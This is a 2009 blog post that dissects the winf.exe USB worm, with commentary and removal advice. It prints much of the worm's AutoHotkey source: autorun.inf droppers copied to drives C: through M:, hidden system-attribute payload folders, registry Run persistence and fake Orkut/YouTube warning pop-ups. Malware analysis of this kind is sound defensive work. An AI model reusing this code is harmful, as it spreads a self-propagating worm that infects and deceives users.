Random thoughts shooting out of volatile mind
winf.exe Disected
Well folks I got my hand on worm winf.exe from my friends pen drive even thought I couldn't get much because of Avast has deleted harmful viruses. But I could save following files.
1. install.txt
2. pathlist.txt
3.drivelist.txt
4. thb.ico (which appears as drive icon)
5. DLL.ico (which is used to mask the programs as DLL file in system folders)
6. Icon.ico (used to hide winf.exe)


 If you want to see these files just rename winf.exe file to winf.rar and extract files. Well when I went through the files I got a rough idea of its working which I'm going to explain here.

The sfx should be created with the extracting path as %temp%      *
 and the program to run after extract is , winf.exe install.txt * 


These lines tell that the install.txt is a input to file wiinf.exe. Next program is supposed to read following entry in registry
HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status 

If its already infected progrma simply exits. The following lines are used for this.
Regread,regvalue,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status
 ifequal,regvalue,present
  exitapp


Next it reads the file pathlist.txt which has following contents
C:\WINDOWS\system32\win.dll
D:\RECYCLE
E:\RECYCLE
F:\RECYCLE 

ArrayCount = 0
Loop, Read,%temp%\winf\pathList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}

Loop %ArrayCount%
{

    path1 := Array%A_Index%

      Ifexist,%path1%
       Ifexist,%path1%\win.exe
         Ifexist,%path1%\std.txt
          exitapp

      FileCreateDir,%path1%
        if errorlevel
          continue
        else
       {
         Filecopy,%temp%\winf\win.exe,%path1%\
          if errorlevel
             continue
Filecopy,%temp%\winf\avgs.exe,%path1%\
         Filecopy,%temp%\winf\drivelist.txt,%path1%\
         Filecopy,%temp%\winf\win.mp3,%path1%\
         Filecopy,%temp%\winf\icon.ico,%path1%\
Filecopy,%temp%\winf\thb.ico,%path1%\
Filecopy,%temp%\winf\DLL.ico,%path1%\
         FileCreateDir,%path1%\reg.bkp
         break
       }
    
    
}
Filesetattrib,+SH,%path1%


Well look at the above piece of code. As per my interpretation what happens here is first path is copied into a variable and then checks to see if path already exists and files like win.exe and std.txt is present, this implies the system is already infected and hence program exits. If not present all the files are copied into all the specified path. Then path attribute is changed to such that they act as system files. Last line of above code does this.
See the following code

Filesetattrib,+SH,%temp%\thb.ico
Filesetattrib,+SH,%temp%\autorun.inf
  

    
      filedelete,c:\autorun.inf
      Filecopy,%temp%\winf\thb.ico,c:\
Filecopy,%temp%\winf\autorun.inf,c:\
      
filedelete,D:\autorun.inf
         Filecopy,%temp%\winf\thb.ico,D:\
Filecopy,%temp%\winf\autorun.inf,D:\

filedelete,E:\autorun.inf
Filecopy,%temp%\winf\thb.ico,E:\
Filecopy,%temp%\winf\autorun.inf,E:\

filedelete,F:\autorun.inf
Filecopy,%temp%\winf\thb.ico,F:\
Filecopy,%temp%\winf\autorun.inf,F:\

filedelete,G:\autorun.inf
Filecopy,%temp%\winf\thb.ico,G:\
Filecopy,%temp%\winf\autorun.inf,G:\

filedelete,H:\autorun.inf
Filecopy,%temp%\winf\thb.ico,H:\
Filecopy,%temp%\winf\autorun.inf,H:\

filedelete,I:\autorun.inf
   Filecopy,%temp%\winf\thb.ico,I:\
Filecopy,%temp%\winf\autorun.inf,I:\

filedelete,J:\autorun.inf
Filecopy,%temp%\winf\thb.ico,J:\
Filecopy,%temp%\winf\autorun.inf,J:\

filedelete,K:\autorun.inf
Filecopy,%temp%\winf\thb.ico,K:\
Filecopy,%temp%\winf\autorun.inf,K:\

filedelete,L:\autorun.inf
Filecopy,%temp%\winf\thb.ico,L:\
Filecopy,%temp%\winf\autorun.inf,L:\

   filedelete,M:\autorun.inf
Filecopy,%temp%\winf\thb.ico,M:\
Filecopy,%temp%\winf\autorun.inf,M:\        



Well this code first changes attribute of the files extracted into temp folders to act as sytem files. Further it deletes any autorun.inf file whic may present in the all the drive and then winf.exe, autorun.inf, thb.ico is copied into all the drives. Further it checks to make sure all copies are present and make a backup copy of it. I couldn't properly interpret this part see it below.



ArrayCount = 0
Loop, Read,%temp%\winf\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}

Loop %ArrayCount%
{

    drivename := Array%A_Index%
                                        ;search in the root of all drives in the drivelist
     ifexist,%drivename%:\winf.exe                        
     {
         Filecopy,%drivename%:\winf.exe,%path1%\reg.bkp\winf.exe
         break
     }
     else
      continue
}
Filesetattrib,+SH,%path1%\reg.bkp\winf.exe


Further it creates a desktop.ini and autorun.inf files and fills it with content which is show in the code below.
;*******************************create desktop.ini*************************************
ifnotexist,%path1%\Desktop.ini
Fileappend,
(
[.ShellClassInfo]
IconFile=C:\WINDOWS\system32\win.dll\DLL.ico
IconIndex=0
),%path1%\Desktop.ini
Filesetattrib,+SH,%path1%\Desktop.ini



;*******************************create autorun.inf*******************************
;Open=win.dll.exe
;shell\open\command=..\winf.exe
ifnotexist,%path1%\reg.bkp\autorun.inf
Fileappend,
(
[Autorun]
open=winf.exe
shellexecute=winf.exe
shell\Auto\command=winf.exe
),%path1%\reg.bkp\autorun.inf
Filesetattrib,+SH,%path1%\reg.bkp\autorun.inf
;*******************************end of autorun.inf******************************* 



Further it writes following registry values.
HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status,present
HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon 


Also this virus is the one which pops up message boxes when you visit orkut or youtube. Well this kinda of message you will be getting and also it has a playback sound ;).

message1=    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window ``r``r                orkut is infected by jammer worm ,30
message2=    msgbox,262160,File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus  ``r``r       ,30
message3=    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run``r``r                   

Well still there are many things this virus can do I can't explain everything here ;). Whenever you see winf.exe files just scan it once to remove all harmful programs(win.exe, avgs.exe, reg.bkp) then you are left with only text image and a mp3 file. If I interpreted something wrongly here please correct me with you comments.
Posted by: copyninja on Wednesday, 7 January 2009

blog comments powered by Disqus
Fork me on GitHub